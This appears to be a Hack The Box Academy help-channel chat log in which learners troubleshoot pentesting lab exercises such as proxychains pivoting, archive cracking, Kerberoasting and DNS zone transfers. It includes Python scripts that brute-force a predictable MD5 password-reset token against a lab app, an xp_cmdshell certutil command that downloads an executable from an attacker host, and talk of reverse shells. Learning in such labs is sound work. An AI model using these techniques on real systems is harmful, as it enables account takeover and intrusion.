[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:26 CEST
Initiating Parallel DNS resolution of 1 host. at 15:26
Completed Parallel DNS resolution of 1 host. at 15:26, 0.01s elapsed
Initiating Connect Scan at 15:26
Scanning 172.16.5.19 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 15:29 (0:02:49 remaining)
```
We can see that nothing is port forwarded.
This is surprising because it works well using xfreerdp:
```
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.19:3389 ... OK
[15:27:52:113] [5112:5114] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:27:52:113] [5112:5114] [WARN][com.freerdp.crypto] - CN = DC01.inlanefreight.local
[15:27:54:421] [5112:5114] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[15:27:54:421] [5112:5114] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[15:27:54:440] [5112:5114] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[15:27:54:440] [5112:5114] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
```
What is wrong with my nmap command?
i don't see where in your outputs it's not being routed?
nmap is showing that it's scanning
it takes slightly longer over a proxy due to it needing to route
-- Initiating Connect Scan
-- connect scan timing
Here is the full log:
```
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:40 CEST
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 0.01s elapsed
Initiating Connect Scan at 15:40
Scanning 172.16.5.19 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 15:43 (0:02:49 remaining)
Connect Scan Timing: About 30.50% done; ETC: 15:43 (0:02:19 remaining)
Connect Scan Timing: About 45.50% done; ETC: 15:43 (0:01:49 remaining)
Connect Scan Timing: About 60.50% done; ETC: 15:43 (0:01:19 remaining)
Connect Scan Timing: About 75.50% done; ETC: 15:43 (0:00:49 remaining)
Completed Connect Scan at 15:43, 201.36s elapsed (1000 total ports)
Nmap scan report for 172.16.5.19
Host is up.
All 1000 scanned ports on 172.16.5.19 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 201.47 seconds
```
There is no mention of "[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.19:3389 ... OK" like we have using xfreerdp. Moreover, when I use wireshark to sniff the tun0 interface, I can see that nothing is sent to the target machine.
it's also just a case of nmap sometimes is dumb
try specifically scanning for 3389
The machine inside 172 maybe doesn't know how to route the traffic back to your attack host
That's not better:
```
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:48 CEST
Initiating Parallel DNS resolution of 1 host. at 15:48
Completed Parallel DNS resolution of 1 host. at 15:48, 0.01s elapsed
Initiating Connect Scan at 15:48
Scanning 172.16.5.19 [1 port]
Completed Connect Scan at 15:48, 2.00s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up.
PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds
```
So why does it work with xfreerdp?
Moreover, as no packets are sent through tun0, I do not think this is a routing issue from the target network.
And is there a way to make it work with nmap? In the module, we can see that we get a response from port 3389 in the nmap scan.
Sure, scan directly from the jump host since it has an interface on 172
Well, the module is about port forwarding...
Also, nmap is not installed on this machine.
also since it's showing as filtered it doesn't mean it's closed
nmap by default doesn't show filtered ports
maybe you can do something with socat but it gets messy, my advice is to scan directly from the jump host
The port is filtered because I got no response:
3389/tcp filtered ms-wbt-server no-response
It is normal because, given wireshark data, nothing is sent to the target. I would like to know why. In the module, the same command seems to work.
or use nmap's proxy option
I already tried and I got the same result.
as well
either way
you know RDP is open, don't get hung up on it
if you're on US servers that's likely why, it seems some labs have issues fully spawning internal networks
EU seems to be fine though
This module specifically has you run nmap from your host through proxychains
I'm looking at it now
I am using EU1.
The purpose of a module is to learn.
That is actually really strange. Are you sure you're still SSH'd to the linux host?
I'm getting the same
need help guys. I got stuck at "ATTACKING COMMON SERVICES - Attacking FTP" exercise
what have you tried, did you scan all ports?
It should work just fine with nmap, and your output suggests that it wasn't being handled by proxychains. However, I am unable to reproduce this - it works 100% fine on my side.
found 2121 port stuck at password guessing
did you try ||anonymous||
yes I tried but it didn't work
?
it should
you're still digging the 10.129.x.x inlanefreight.htb site
you're gonna find answers within those records
within the records you will find there
or one of the other subdomains you can dig to
got it
did you not specify port for ftp?
I did not try without a password
that's how that login works my guy
if you read the section it talks about anon login
yeah Thanks
are you digging to the subdomains with the @10.129.x.x?
weird
this is on Active Subdomain Enumeration in the Info Gathering Module yeah?
try more of the found subdomains
there's more than those
hint: you know where the txt record is yes?
look there
hashid file.hash
did you try with the mutated password list?
yes, didn't work
john does nothing, it says session completed after one second of execution
I wouldn't use john tbh and your mutated list needs to have 94k words
^
tried with fcrackzip
been meaning to throw an erratum for this module as the cheatsheet is missing the | sort -u
it should work with john/hashcat
Module:
Section:
Link of the module:
Description:
eh in future do that
but this is at least a niche enough question to know where it's from
link of module isn't necessary tbqh
module password attack
section Protected Archives
link : https://academy.hackthebox.com/module/147/section/1323
and double checked the official walkthrough: the mutated wordlist should have the password
not the mutated kira list but the full- whole hog- mutated list that has 94k words
im just lazy to manually look it up XD
¯\_(ツ)_/¯
when i dont supply wordlist it starts bruteforcing
when i supply the wordlist it stops bruteforcing
i just know it's in the mutated list
session completes in 00:00:00
it looks like you're only using the mutated Kira list
not the full mutated list created from the password.list and custom.rule
as stated earlier; that word list is ~94k words long
the tail end of the full mutated list should be Yellow99!
How to track ip address
got it
don't use --force when you're mutating a wordlist with hashcat btw
For what purpose, tracking an IP doesn't necessarily go as far as you think
It can give you a general geographic location
hey friends, i am at Skills Assessment - File Upload Attacks, trying to get the source code but i don't know what's wrong, i did it a year ago and trying it again
you sure the path is correct ?
idk how it will handle /contact/upload.php
oh yes my bad, i tried contact/upload.php too but the same happened
start with ../index.php first
same
I need help in Q1 from Predictable Reset Token section from Broken Authentication academy module.
I understand what to do but am confused with the format.
Look up predictable reset token in this channel, I believe @next bronze made a list of basic things to do
Hi, I am doing the ICMP Tunneling with SOCKS section of the "PIVOTING, TUNNELING, AND PORT FORWARDING" module. I have set up the ptunnel server and connected to the server so that a listener on port 2222 is started on my attackbox. However, when I try to establish an SSH connection through the ICMP tunnel, it is not reliable and doesn't succeed much. I keep on getting the error. Is this expected behavior? If not, what can I do to make it more reliable?
did you try to decode the content and see what you got ?
it should be pinned
yes it's the file i am trying to send
i know all these things.
but it looks like something is wrong in my solve.
can i DM you the solution?
my script should work but there is no hit.
i have read the source and know that the last 3 digits are to be bruteforced, which i did.
i have computed md5 according to the open meeting source code snippet
i just got it, for some reason it was the magic bytes that were not making it work, that's so strange
thank u so much
||GIF-8 ?||
I didn't help , but gg
```python
# excerpt of the reset-token script: data (the page body) and i (the loop counter)
# are defined in the surrounding code
time = re.findall(r'created at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\w{2})', data)[0]
utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())
utc_datetime *= 1000
hash(b'htbuser'+str(utc_datetime+i).encode())
```
here is the specific portion of my code which i am using to get the hash
no it's ||ÿØÿà for jpg||
it should be in epoch time, and again you'll need to generate a hash for every millisecond, I'm not seeing the loop where you're doing that
weird you got this in your first request
read this again pls #modules message
no i mean it worked when i remove it, it was the reason for it to not work
aah maybe it forces the file to be jpg instead of svg so the webapp couldn't read the file
i think so, but i tried without it first and it didn't work for some reason
maybe the path was wrong
i think i am doing it correctly while keeping milliseconds in mind.
any one done the Attacking Common Applications - Other Notable Applications questions? Outside of the metasploit module is there another way to do this?
I was using the same exploit as in this post
https://forum.hackthebox.com/t/attacking-common-applications-other-notable-applications/252457
i was trying to get the powershell invoke request to execute a custom msfvenom payload reverse shell. I tried multiple extensions but nothing contacted my listener. any help?
Hello, I am currently stuck at achieving RCE at "Other Notable Applications". I was able to figure out the vulnerable application and a suitable CVE 2020-14*** with a Python script "Server Remote Code Execution". However, I was not able to insert a suitable command to obtain a reverse shell. Uploading NC.exe or MSF windows/shell_reverse_tcp...
aaah yes, u r right
you'll also need epoch time
100-1000 range? so you're also only sending 900 requests
bcz we only need the last 3 digits for milliseconds, that's why it is from 100-1000, cuz this range has all the 3-digit numbers
that doesn't seem right, the requests need to be from the range of +/-1 seconds, so you'll need to cover a second before the start too
I'm not sure what kind of hash you're generating, and you're hashing the bytes of the string itself, idk if that will make it generate a different hash
I believe there's a sample given in the section, try to use that
Here is the complete code
```python
from datetime import datetime
import requests
import hashlib
import re

ip = "http://94.237.49.212:43831"
hash = lambda x: hashlib.md5(x).hexdigest()

def get_token():
    # request a reset token for htbuser and return the page body
    data = {"submit":"htbuser"}
    req = requests.post(ip+'/question1/', data=data)
    return req.text

data = get_token()
token = re.findall(r'token is: ([a-f0-9]+)', data)[0]
time = re.findall(r'created at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\w{2})', data)[0]
# creation time as epoch seconds
utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())
for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()
# same loop, one second later
utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())+1
for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()
# same loop, one second earlier
utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())-1
for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()
```
i have also added +1/-1, still no hit.
INTRODUCTION TO MALWARE ANALYSIS - Debugging
guys i am having trouble. i used my own vm, downloaded inetsim and configured it accordingly, and i updated the dns for the windows machine.
i did all the debugging
0x1 to 0x0
je to jne
jne to jmp
when i run it nothing happens. i have also browsed to the internet and can see that inetsim is configured properly.
Any help please
did you network the two vms?
what do you mean by that?
inetsim should be running on another vm, no?
yep
so you have to network the two vms so that they can communicate with each other
did you do that?
change the dns address in the windows machine?
from my windows ping to the target?
i guess not the windows machine but you should be able to ping the linux vm from your windows vm
oh i understand now i read it wrong
i thought you had two VMs
if you are doing it from your own vm, you are going to have some trouble
i think i tried it on the provided instance also, it had the same problem
i did it with the pwnbox but that was awful and not recommended
Vbox has documentation on its networking modes
if you can do it, i would try to setup your own airgapped network
does setting the breakpoint matter?
if you updated the jump instructions accordingly, then it shouldn't matter
Setting a breakpoint tells the debugger to stop after or at a certain instruction point
do you get the popup message saying that it sent to C2?
nope
then you may have missed a jmp instruction
there's only 3 right?
when i open shell.exe without anything i also didnt get any sandbox detected prompt
this is kind of difficult to debug since i'd have to do the exercise myself
i wonder if the message pops up after it sends the connection or before it sends the connection
what do you mean by that?
if the message pops up after it sends the connection, then it has to actually make the connection first. if it can't do that, then it can't send the message, thus no message box
which would mean that you may have something configured incorrectly
if it sends it before it actually makes the connection, then i'm not sure what the issue is
i would assume the former in this case
so can you show your DNS config real quick
i already closed it, im bout to go to bed, im gonna reread it tmr
the inetsim works when i went to the internet and search something it shows inetsim
so it cant possibly be with dns configuration issue
it may be a server issue too, idk
Did anyone else take 1.5 hrs to complete the Oracle TNS module? the odat.py was the slowest thing on earth
can i dm you my whole steps from start to finish tmr?
I'm not a code reviewer unfortunately, but here is the general loop I used
```python
from datetime import datetime
import hashlib
import re
import requests
import pytz

# timestamp, url and flag_re are set elsewhere in the script (not part of this snippet)
dt_now = datetime.strptime(timestamp, "%Y-%m-%d %I:%M:%S%p")
dt_utc = dt_now.replace(tzinfo=pytz.UTC)
current = int(dt_utc.timestamp() * 1000)   # creation time in epoch milliseconds
start = current - 1001
for i in range(start, current + 1001):     # cover +/- one second around the creation time
    ...

def check_token(i):
    # hash the candidate millisecond timestamp and submit it; a non-"Wrong token"
    # reply means the guess matched
    input_str = f"htbadmin{i}"
    token = hashlib.md5(input_str.encode()).hexdigest()
    data = {"token": token, "submit": "check"}
    response = requests.post(url, data=data)
    if "Wrong token" not in response.text:
        match = re.search(flag_re, response.text)
        return token, match.group() if match else None, i
    return None, None, i
```
mb read that wrongly
thanks, i will try it and let you know.
Thanks @next bronze. solved via your script.
weird. got the platinum member subscription and received the 1000 cubes but the amount of cubes required for the module remains unchanged
the prices for the modules don't change
where does it say that?
Compared to buying the cubes outright
that's a 36% discount for buying cubes
Compare the $68 To the price of outright buying cubes
yea, i made a mistake
can someone give me the total cost for the cpts exam + student plan?
the cheapest route to get it
$218
if you can complete it in one month that is
but probably not so $210 + $24 (3 month student sub)
3 months, that's my goal before my next semester starts
then you buy cpts voucher right?
thank you
In the Thick Client portion of the Attacking Common App module I keep getting this error across multiple resets. If anyone is familiar with it, please point me in the right direction.
P.S. I can't paste my screenshot in this chat so hopefully the above link is sufficient
Read and follow #welcome to be able to screenshot
Thank you @fathom pendant I hope you guys can see it now
access denied
Your user isn't admin/system to be able to perform the task
The credentials HTB gives me for the exercise allow me to run tools as an administrator. Is that different from the permissions you're implying? I can access PowerShell for example as system
Hey
I'm having problems accessing the target machine, ping and nmap get no response (I'm using pwnbox), thank you if anyone can help me
Click the "change" button with the UAC shield next to it
What academy module is this in relation to
Read and follow #welcome to access more channels like #starting-point (starting point) and #boxes (boxes)
Ok
im working on footprinting on the pentester path... am I going crazy with the smtp-user-enum command... this should work right?! i even tried it with -p and it still throws the same error (even though it's not needed bc -p 25 is the default)
Anyone else have issues with the "Permissive File System ACLs" section of the Windows Privesc module?
I am trying to run the
sc start SecurityService
but I am not getting the reverse shell
went and checked the walkthrough and I did everything exactly how the walkthrough showed
increase the timeout
it's either w or W i genuinely forget
also -t is the port
not the target
wait
it's just being dumb ig
bc that looks like it should be valid syntax
module and section?
just spun up my own pwnbox, works fine for me
also use the footprinting wordlist from resources
it could just be that the Userlist doesn't exist and it's being dumb
it's -w btw
you can also adjust worker processes with -m
default is 5
Good evening house, pls, still on the kerberoasting section of Windows Attack & Defense. I have solved the number 1 task that has to do with the password of the svc-iam user. On the event side, it's where I am: I have successfully logged in to the stipulated ip_add. My issue is that I search event 4769 and try to find svc-iam but the only result I got, the sid I got, it's incorrect. Any hint on where I got it wrong?
Here's the question: {After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?} so it's referring to the web service user's SID and the just concluded attack was on the svc-iam user
Got a quick one I could use a nudge on, deductive reasoning: using xp_cmdshell to file transfer executes the command GET request via powershell, doesn't transfer the data, but creates the empty file. I have a decent idea, but want to gain validity on whether using http is not the way vs smb in terms of theory
many ways to crack an egg ed boi
certutil is often better for this purpose than xp_cmdshell powershell -c "wget" blah blah
The fact you used an ed edd and eddy reference grants you many rep points. GG
So funny thing is I've attempted certutil, and I'm sure the syntax is incorrect but it does execute. Wget, etc seems to take quite a bit to hang or timeout--or do magical fairy things I'm not aware of Lol
Hmm...
If certutil works via the specified port for the ft server, but no data is transferred, then I'm either stuck on a reverse proxy to an internal host or the protocol should be smb to perform the ft (using native tools). I'm not satisfied with this, but it might be the technical solution
I'm open to more input, as I'm perplexed why data failed transfer but created the file
Thanks Marcie!
just refer back to the file transfers module if something ever goes oopsie in a file transfer
You might generally fall into a habit of one, but doesn't hurt to know others
This is true
Great! Appreciate this a lot!
Speaking of I need to re-set up my attacker nginx that had all my cool tools to transfer
i even had an apache default html for the luls
??
it doesn't look like expected behavior
have you tried changing vpn regions and performing the same steps
can you complete it using a different technique
sanity check: if i have an ssh pub key, i should be able to change the perms of the pubkey and be able to send it to ssh with the -i flag... (given all the other info is correct) correct?
something is amiss in my brain
well, in this instance, i just stole the keys from an open port but im not able to overwrite the authkeys or put in my own id_rsa, so im just trying to force ssh to use their own user's ssh pubkey to access
yeah most likely it's already there if you got it from the same box
well
or another box on the network
you wouldn't use their pubkey to access
you'd use their priv key
aka the id_rsa file
(or you'd add your public key to the authorized users file)
there is a lightbulb in my brain now
but I guess the reason is, why? wouldn't the server have their own priv key, so I would use what's typically publicly available to me? why would I send the server the priv key?
^
generally you don't put your private key out on the open internet
doing so would be bad for you
you wouldn't want to share your private key because then someone could auth as you
your private key says "I am this person" and the server agrees, because who else would have your private key right?
whenever something is sent over SSL to you, it's encrypted using your public key, and decrypted on your end with your private key
ah, okay this all makes sense. My thought process here was the server has the privkey of said user, so let me send the pubkey of said user to it so it can validate it, but if EVERYONE has the pubkey it doesn't make sense for the server to give me access as that user because it doesn't actually authenticate me
it's why; in ANY text regarding the pub/private pair, you're ALWAYS urged to never give your private key
exactly; what the private key authentication does is it compares it to the public key (or authorized keys) file for what would give it a proper sum value (as this specifically is based on the RSA algorithm, which is just 2 REALLY big prime numbers)
there's some other stuff that goes into creating it
but at the core of it is REALLY big numbers
the product of 2 primes which makes it hard to actually decode (at least for current computing standards)
RSA (Rivest–Shamir–Adleman) is a public-key cryptosystem, one of the oldest widely used for secure data transmission. The initialism "RSA" comes from the surnames of Ron Rivest, Adi Shamir and Leonard Adleman, who publicly described the algorithm in 1977. An equivalent system was developed secretly in 1973 at Government Communications Headquarte...
so sorry to beat this topic, so if sending my privkey is part of the authentication process, is sending a pubkey just for "authorization"? Like why would I send my pubkey or what instances would that be?
crypto was my most devastating course in my studies LOL this explains why I'm asking so many questions
hi, sorry to post here but I can't find the appropriate channel to ask.
I'm unable to login to htb academy after they migrated to single sign on. anybody facing the same issue?
reach out to support
my email is only registered with htb academy and not htb account.
they're the only ones that can help you
I've dropped them an email at customerops@hackthebox.com but still not getting any response.
well then be patient
this channel is in regards to academy modules
not general support, support agents do not monitor this chat
nor the discord in general
it is also the weekend, so it may also increase a time of response
I see.
np; the other part of RSA is message signing, but in this case you're not signing anything (Aside from maybe your connection packet, but that's a whole other can of worms that i'm not qualified to discuss lmao)
whats the earliest date you can see in the logs, after filtering for event 4769?
they figured it out; they reset and re-ran the attack
#cdsa was where we resolved
np
i sanity checked the guide for them
so that way they weren't going crazy
i wonder if i binged the CDSA path how fast i could complete it
some of the modules require a ton of reading
i mean i've sanity checked a bunch of people on the reading portions before
any academy admin?
for?
i just noticed something wrong in an nmap section in the academy
no it's just a mistake from whoever wrote the command
Module Name - Section
Type of correction -- (screenshots as applicable)
Tag (in this case typo)
even if it's a small mistake it's still something you can throw at #1234357888114364508
as staff that work on academy content will see it
and adjust as needed
¯\_(ツ)_/¯
yeah i will be happy if i give them some little help
it seems important if you need a staff to see it right away
but staff sometimes sleep
no it's not that important
#1234357888114364508 is a place for the correction to not get drowned out either
well it was important enough to come ask for someone
so you might not be the first who thought of it
¯\_(ツ)_/¯
hey I dont have permission in any other channel any idea why?
thx
Anyone have some time to chat about SQLMap Essentials? I'm working on "question 7" and I'm not figuring out how to get SQLMap to find the vulnerability.
same here, still waiting on support (Stephan)
¯\_(ツ)_/¯
all I can say is be patient
once support resolves they'll reach back out to you
and... creeped myself out...
yep, not the first time. won't be the last.
@dim wolf this is my outcome
Hey I was stuck on this for a little while today too. I saw you didn't get any real good help yet. Here is a nudge, first thing I did was turn off the other filters from the section. Then refresh the page and intercept a ping for say the number 1. See where that ends up and create a regex filter to always change that to ;ls; like the instructions say. DM me if this doesn't help. Cheers!
my guy that was from 2 months ago
i'd really hope they figured it out by now
Me too but I was just trying to help the guy in the future like me that knows it is easier than what they are making it in their head and just needs a nudge since I couldn't find that anywhere.
Wacky moment: I definitely have the right command but no matter the transfer tool that was attempted (certutil, copy, wget, curl) it doesn't succeed
Would the data perhaps fail to transfer for untrusted reasons? I'm nearing the end of ideas
Hmmm......
For context, this is skills assessment II in ad enum/attacks (I skipped this for issues I've had with spawning)
try changing to EU vpn
or changing VPN regions in general
see if that resolves your issue
Right.. I wonder though-- if it's "internal" (the virtualized network being pentested) per se would the vpn still have any effect on file transfer and cmd execution? I'll definitely try that. Still open to ideas to help nudge along the way
it could be that the target spawned on that vpn isn't spawning the internal network properly
For clarification, I refer to 10.129.x.x ft to 172.16.x.x.
well
True
i hate to burst your bubble
Pls do
but do you have a connection to that 172 network?
I'm dying to know LOL
oh wait misread
but also
are you calling the file transfer to the 10.129 address?
or are you using the matching 172.16 host address of the jump host
:)
aka are you trying to file download to one by calling certutil/wget on the 10.129 address
if so... network
Great questions! So I've scp'd revshell and lpe exe to the 10.129.x.x for ft into the 172.16.x.x SQL01 host via python or impacket-smb and certutil or smb/http methods. Certutil executes but no data transfers (I'm wondering if it's an auth issue based on some unique stdout). Most other ft methods hang like curl, wget, etc
we'd need to know some basic info, like your syntax, if you can ping/rdp in etc
I'm cracked on caffeine, scuse the typing
again
syntax
from the SQL01 host
are you trying to call the jump host's 10.129 address
or its 172.16 address
The internal nic ip (172) because the SQL01 isn't able to reach the external ip of skills-par01
Syntax as follows:
#certutil: SQL> xp_cmdshell certutil[.exe] -urlcache -split -f http://172.x.x.x:<port>/filename.exe C:\writeable\path\filename.exe
Notes: various combinations have been attempted like added/removed quotes around url and output to file, params/options added removed, etc
Every attempt has been with xp_cmdshell
there's a lot wrong there
first we still don't know how you're remoting into the pivot host
second we don't know what box you're executing this on, what you're targeting
I just ran into this a couple days ago believe it or not the issue is the VPN it has to be one of the EU ones the US ones won't work no matter what you try.
we need to see the actual real command, not obfuscated
as said earlier
certutil doesn't start with # or end with :
....
i think they're marking when they started their certutil command
Ye
but they're too cracked out on energy drinks to realize that makes it more confusing
you can't paste either of those commands in and expect them to work
Double ye lmao
like i said, we need to see the commands, what your targets are, how you're pivoted in
I'm typing from mobile
either way
try changing to an EU vpn
and seeing if that fixes the issue
as I stated way earlier
fuckin crackhead
Lmfao will do Marcie. I really appreciate the input
you're trying to think of 20 things at once, which isn't helping
slow it the fuck down
Brb
Also SuperNuts, I appreciate the assistance as well. I'm usually better with cmd syntax to help others assist me, so I appreciate everyone's input and patience.
ya sorry we just need more info to really give good help
Ye ik
I'll do my best! Just waiting for the vpn region to switch atm. Answering your questions in the meantime, The SQL01 is receiving command input from skill-par01 via mssqlclient.py using xp_cmdshell. I'm able to rdp into MS01 via rdp into skillspar01 or proxychains with ssh -D 9050 etc. I'm targeting the SQL01 to gain a revshell as either admin/system <snip>
you crackhead typed this out
I did I did lmao
you can easily say this with a lot less words
ssh/rdp to jump host; connected to SQL01 via mssqlclient
that's literally the 2 important bits
we don't care about MS01 for this
That was a crackhead oops
Sigh still waiting for target spawn
i am stuck at footprinting - dns
what have you tried so far; what has you stuck
saying you're stuck doesn't magically make us know what's troubling you
if you have the answer to the txt question, you can answer the other questions
second question. zone transfer. i have tried axfr but it doesn't seem to be working
dig axfr domain @nameserver/ip
if you have the nameserver in your /etc/hosts it may help, but it's not necessary
this can all be done without editing your /etc/hosts
doesn't seem to be working isn't a valid error
if you look you can see if it's trying to query a public nameserver or not
since .htb isn't a valid tld, it'll fail out
aah got it so dig axfr inlanefeirght@ip
yes
will try and let you know thanks
i didn't put the space between the domain and @
also when in doubt just try everything (you'll understand for the next questions)
nice